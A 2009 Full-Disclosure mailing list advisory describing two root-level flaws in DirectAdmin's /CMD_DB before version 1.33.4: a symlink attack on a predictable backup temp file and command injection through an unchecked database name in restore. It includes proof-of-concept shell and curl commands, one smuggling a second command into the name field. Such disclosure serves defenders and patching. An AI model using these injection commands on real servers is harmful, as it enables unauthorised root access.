DirectAdmin < 1.33.4 Local file overwrite & Local root escalation

[anony mous <137215c1224fde443096afa70f319f () gmail com>]

Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation

Author: Anonymous
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b
Date: 22-04-2009

The issue on http://www.directadmin.com/features.php?id=968 is larger than
the wording would indicate.

It fixes two issues in /CMD_DB.

--- Local file overwrite ---

action=backup runs a mysqldump as root and generates a predictable temporary
file in the temporary directory defined as tmpdir in
/usr/local/directadmin/conf: "$tmpdir/${dbname}.gz".
It does not check if the file exists before piping the output of "mysqldump
| gzip" into it, allowing any DA user to create or overwrite any file on the
server as root.

PoC:

On server: $ ln -s /etc/poc /home/tmp/database_name.gz
On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz
On server:
$ ls -la /etc/poc
-rw-r--r--  1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9

--- Local root escalation ---

action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being
unchecked, allowing any DA user to run any code as root.

PoC:

On client: curl -n -F action=restore -F domain=poc.com -F
'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc'
http://directadminserver:2222/CMD_DB
On server:
$ ls -la /etc/poc
-rw-r--r--  1 root root 5 Apr 22 10:30 /etc/poc
$ cat /etc/poc
test

-- 
Anonymous

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/